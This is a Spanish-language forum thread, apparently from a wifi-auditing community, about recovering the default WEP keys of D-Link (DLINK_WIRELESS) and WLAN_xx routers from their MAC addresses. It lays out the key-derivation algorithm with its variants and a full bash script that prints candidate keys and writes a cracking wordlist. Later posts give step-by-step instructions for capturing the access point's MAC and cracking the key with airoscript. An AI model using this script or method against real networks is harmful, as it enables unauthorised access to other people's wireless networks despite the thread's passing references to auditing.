claves WEP de DLINK WIRELESS y WLAN_xx

[fje]

He leido por algún sitio que hay un procedimiento para llegar a la clave de un essid DLINK_WIRELESS similar al de WlanDecrypter y los WLAN_xx.

Y he hecho busqueda por todo el foro por DLINK y por DLINK WIRELESS, pero no lo encuentro , sólo un par de referencias a que sí existe ese método de llegar de forma fácil a la clave de los DLINK.

¿Alguien puede darme un puntero hacia un post donde se discuta ese método?

Gracias !!!

[uNbAs]

www.elhacker.net

Ahi quizas encuentres lo que busques ... pero ...no se io como funcionara ...

[fje]

Gracias, unbAs,

ya lo he buscado en elhacker, y tampoco. Se habla mucho de D-Link y sus fallos, pero no lo que ando buscando....
 
¿Alguna otra pista de alguien que le suene lo mismo que a mí y recuerde por dónde puede estar?

Gracias....

[βerni69]

era un programa insertado en una web pero nunca lo use....

[Hwagm]

wifislax 3.1 lleva integrado perfectamente el dlinkdecrypter.

Ademas ya no solo como lanzador unico sino que esta integrado en el propio airoscript y en el airoscript para las ipw2200.

http://www.wifislax.com/contenido/aplicaciones.html

puedes verlo exactamente hay.

[Hwagm]

[Hwagm]

[fje]

¡Hala, hala...!  Esto es colaboración y cualquier otra cosa, es cuento....

Miles de gracias a los que de pronto me habeis contestado. Precisamente iba a editar mi post anterior porque sí había encontrado algo brujuleando más en "elhacker", la web del EASY WEP FINDER, lo que es curioso es que he llegaod a ahí a través del google y sin embargo el "buscar" de elhacker no me llevaba....

voy a probarlo.... y probaré también el WifiSlax 3.1, que ya me lo he bajado, pero a otro ordenador que tengo en otro sitio, y hasta dentro de unos días no puedo acceder.

Gracias de nuevo

[Hwagm]

Otra cosa es que luego te funciona perfectamente.

 

[fje]

Por cierto, como ya he dicho antes, aun no puedo probar con wifislax 3.1, pero sí he hecho unos ejercicios con el Easy WEP Finder con WLAN_xx cuyas macs y claves conozco (usando la suite aircrack y el wlandecrypter) y no me sale la misma clave.

Tengo que seguir experimentando con más tiempo. Con el DLINK aún no he podido probar.

[hrodgar]

A ver... yo hablaré sobre las DLINK... que es sobre lo que se 

Efectivamente, los post sobre el tema son los siguientes:

http://foro.elhacker.net/index.php/topic,169964.0.html

http://foro.elhacker.net/index.php/topic,173971.0.html

Por lo que respecta a wifislax 3.1:

sobre el dlinkdecrypter.sh

Funciona bien... en parte. El problema, y tal como se habla en los post, es que existe al menos una versión del algoritmo inicial (que por lo que parece por la estadística sería al reves... ): en que al 6º par de la MAC hay que restarle 1 (p.e. si es 34 pues 33). Por cierto... en este caso hay que restarlo en todas las veces en que aparezca el 6º par el en la clave!!.

sobre el lanzador que genera el "diccionariodlink"

Surgió (y si me equivoco que pianista o hwagm me corrijan... ) cuando salió lo de la variante de restar -1 al 6º par y la coincidencia del algoritmo con algunas wlan_xx.

Ante la duda pianista decidió generar un diccionario todas las posibles combinaciones en HEX de los 2 últimos dígitos de la WEP (entiendo por lo de las xx de las wlan_xx)

El problema que veo es que, en primer termino y como he indicado en caso anterior, junto las 255 254 combinaciones de la wep faltaría generar las 255 254 combinaciones con el 6º par modificado las 2 veces que sale.

El segundo... diria que hay algun error en la generación de las combinaciones. si tendría que generar 255 254 claves en que solo cambia los 2 últimos digitos de la WEP (del 00 al FF), y por lo que veo, las generava del 11 al GG!

jejeje... un lio... espero haber sabido explicarme....

[fje]

Hrodgar, gracias.

ya había encontrado esos 2 post de elhacker (curiosamente a través de Google) y me he bajado el "programita" y quiero hacer alguna prueba con él y con la url directamente, aunque aún no he podido.

Con respecto a lo de WifiSlax 3.1, la verdad es que fdebo estar algo "espeso" pero no me he aclarado:

1.- Funciona tal cual sí o no?
2.- Si es que no y hay que restar en determinados casos el 1 no me queda claro cuándo, y en especial releyendo lo que has escrito subrayado, que creo que alguna palabra o alguna letra se te ha "traspapelado".
3.- Y desde luego, si en algún caso sale "GG" o espera que salga "GG", pues algo no anda muy bien, pues hasta donde yo recuerdo de mis épocas binarias, el hexadecimal acaba en FF.... aunque tal y como van las cosas, el día menos pensado empiezan a utilizar una base de numeración más complicada (al estilo de los babilonios, por ejemplo), para hacernos la "pugneta" a algunos.....

Salu22222

[Hwagm]

vale ok, los lanzadores se quedan igual y tambien el airoscriopt, solo hay que trabajar en el dlinkdecrypter.sh que lleva el wifislax.

Primero metemos aqui mismo el codigo , y que alguien se anime a modificarlo, asi esa script ya no solo valdra para el wifislax sino para todos los linux, y que el fichero que genere esten todas esas posibilidades.

[Hwagm]

ostias acabo de estar con wifislax y wifiway y me olvide de sacer el codigo de la script, si lo teneis por hay , meterlo y se mira su modificacion

[hrodgar]

Bueno, he releido el post, y creo que bastaria de la siguiente manera (voy a poner un ejemplo):

Tenemos una MAC tal como 11:22:33:44:55:66

Las soluciones que tendría que dar el dlinkdecrypter.sh, teniendo en cuenta el algoritmo original y su variante serían (resaltando en rojo el 6º par de la MAC):

Opción 1:   Algoritmo original

                  66115522334466552233441133

Opción 2:   Algoritmo original, restando -1 al sexto par la 1ª vez que aparece

                  65115522334466552233441133

Opción 3:   Algoritmo original, restando -1 al sexto par las 2 veces que aparece

                  65115522334465552233441133

En principio, son estas 3 opciones las que afectan a los dlink con wep preconfigurada. Si no sale con estas 3 claves, dudo que salga con el generador del diccionariodlink. Pero si aún así se quiere intentar, tendría que dar las siguientes claves:

Las 254 combinaciones posibles cambiando los 2 últimos dígitos de cada una de las claves generadas anteriormente con el dlinkdecrypter.sh (o sea, desde 00 hasta FF). 254x3= 762 posibilidades.

I prou... si no sale, pues a capturar y "el procedimiento habitual"... 

Añadido:

Por cierto, si el ultimo par es por ejemplo B0, al restar quedaría AF
Y si es por ejemplo BA, al restar quedaría B9

[Hwagm]

pues listo para realizar la script, a ver quien se anima

[hrodgar]

yo lo haria... pero me quede con programar en basic (si,si... el del DOS!!)... asi que imagínate mi nivel en linux

[hrodgar]

bueno... como no lo ponia nadie... le he hechado un par (ya te dije chimoC  ) y lo he modificado yo...  a ver como ba esto del bash....

Antes que nada... no me pegueis eh???... lo he hecho usando los comandos que ya había en el escript.... un cut por alla... if.... ctrl+c y ctrl+v....

Ya se que es una animalada... pero como no domino el tema, pues que alguien se lo curre para reducir el código... a ver si tendre que ponerme en serio a aprender a programar en bash 

Recordad!!! las letras hay que ponerlas en MAYUSCULAS..

codigo dlinkdecrypter.sh modificado

#!/bin/bash
P1=`echo $1|cut -d : -f 1`
P2=`echo $1|cut -d : -f 2`
P3=`echo $1|cut -d : -f 3`
P4=`echo $1|cut -d : -f 4`
P5=`echo $1|cut -d : -f 5`
P6=`echo $1|cut -d : -f 6`
P61=`echo $P6 | cut -c1-1`
P62=`echo $P6 | cut -c2-2`

S1=$P61

if [ $P62 = "F" ]; then
   S2="E"
fi

if [ $P62 = "E" ]; then
   S2="D"
fi

if [ $P62 = "D" ]; then
   S2="C"
   fi
if [ $P62 = "C" ] ; then
   S2="B"
   fi
if [ $P62 = "B" ]; then
   S2="A"
   fi
if [ $P62 = "A" ]; then
   S2="9"
   fi
if [ $P62 = "9" ]; then
   S2="8"
   fi
if [ $P62 = "8" ]; then
   S2="7"
   fi
if [ $P62 = "7" ]; then
   S2="6"
   fi
if [ $P62 = "6" ]; then
   S2="5"
   fi
if [ $P62 = "5" ]; then
   S2="4"
   fi
if [ $P62 = "4" ]; then
   S2="3"
   fi
if [ $P62 = "3" ]; then
   S2="2"
   fi
if [ $P62 = "2" ]; then
   S2="1"
   fi
if [ $P62 = "1" ]; then
   S2="0"
   fi
if [ $P62 = "0" ]; then
   S2="F"
   if [ $P61 = "F" ]; then
      S1="E"
      fi
   if [ $P61 = "E" ]; then
      S1="D"
      fi
   if [ $P61 = "D" ]; then
      S1="C"
      fi
   if [ $P61 = "C" ]; then
      S1="B"
      fi
   if [ $P61 = "B" ]; then
      S1="A"
      fi
   if [ $P61 = "A" ]; then
      S1="9"
      fi
   if [ $P61 = "9" ]; then
      S1="8"
      fi
   if [ $P61 = "8" ]; then
      S1="7"
      fi
   if [ $P61 = "7" ]; then
      S1="6"
      fi
   if [ $P61 = "6" ]; then
      S1="5"
      fi
   if [ $P61 = "5" ]; then
      S1="4"
      fi
   if [ $P61 = "4" ]; then
      S1="3"
      fi
   if [ $P61 = "3" ]; then
      S1="2"
      fi
   if [ $P61 = "2" ]; then
      S1="1"
      fi
   if [ $P61 = "1" ]; then
      S1="0"
      fi
   if [ $P61 = "0" ]; then
      S1="0"
      S2="0"
      fi
   fi

echo "Wep key default DLink"
echo "             Opción 1: "$P6$P1$P5$P2$P3$P4$P6$P5$P2$P3$P4$P1$P3
echo "             Opción 2: "$S1$S2$P1$P5$P2$P3$P4$P6$P5$P2$P3$P4$P1$P3
echo "             Opción 3: "$S1$S2$P1$P5$P2$P3$P4$S1$S2$P5$P2$P3$P4$P1$P3

for f in 0 1 2 3 4 5 6 7 8 9 A B C D E F
do
   for t in 0 1 2 3 4 5 6 7 8 9 A B C D E F
   do

echo $P6$P1$P5$P2$P3$P4$P6$P5$P2$P3$P4$P1$f$t >> /root/swireless/wordlist/diccionariodlink
echo $S1$S2$P1$P5$P2$P3$P4$P6$P5$P2$P3$P4$P1$f$t >> /root/swireless/wordlist/diccionariodlink
echo $S1$S2$P1$P5$P2$P3$P4$S1$S2$P5$P2$P3$P4$P1$f$t >> /root/swireless/wordlist/diccionariodlink

done
done

Ale... probadlo... a ver si la he liado....

[ANELKAOS]

He probado el dlinkdecrypter y wlandecrypter de la 3.1 en entornos reales (auditando, no penséis mal...) con la edimax (chipset rt73) y funcionan perfectamente.

No pongo las capturas porque son exactamente las que puso Hwagm pero las tengo en un pendrive.

Paso 1. Ataque 1 y sacas la mac del AP

Paso 2. Generas el diccionario

Paso 3. Opción 15 de airoscript

En cuanto tenga un hueco pruebo tu script, ya te contaré hrodgar

1Saludo.

[ChimoC]

Buenas anelkaos:

Pero lo has podido comprobar en entornos reales  cuando un sexto par es del estilo EA.... porque ahí es donde se "engancha" (por lo menos a mí)

Hrodgar..... para mí eso que has puesto es magia .... ya te felicito unicamente por el esfuerzo... si rulase (que seguro que lo hará) el pincho y refresco o caña van de mi parte 

Un saludo

ChimoC

[ANELKAOS]

Bueno, pongo esta que no es del trabajo, si no de un amiguete con el que acabo de hablar y me ha dado permiso:

Código:

  00:17:9A:11:¿?:1A        6       WEP     -1      69      DLINK_WIRELESS

Con el Dlinkdecrypter obtengo:

Código:

Wep key default DLink:  1A00¿?179A111A¿?179A11009A

Nótese que he cambiado un par la MAC original por los símbolos '¿?' y el canal por '69' que nadie se lleve las manos a la cabeza 

Paso 1. Ataque 1 y sacas la mac del AP:

+ En este caso suponemos 00:1B:11:11:22:EA para probar

Paso 2. Generamos el diccionario:

Paso 3. Obtenemos la clave WEP por defecto que, como podéis ver, sigue la estructura de siempre:

Estaré al tanto por si auditando sale una del estilo EA:....  con clave por defecto y no puedo conectar pero yo diría que sencillamente es que se ha cambiado la clave WEP a pesar de mantener el SSID.

[ChimoC]

Buenas:

Por ejemplo... yo hablo de la de otro colega y la suya termina en EA, pues la clave debería comenzar por E9 y el dlinkdecrypter la da por EA.

La clave del router es la que viene por defecto de fabrica (E9)

Un saludo

ChimoC

[hrodgar]

Pues en principio, con la modificación del script esto se corrige.

[Hwagm]

pues pal saco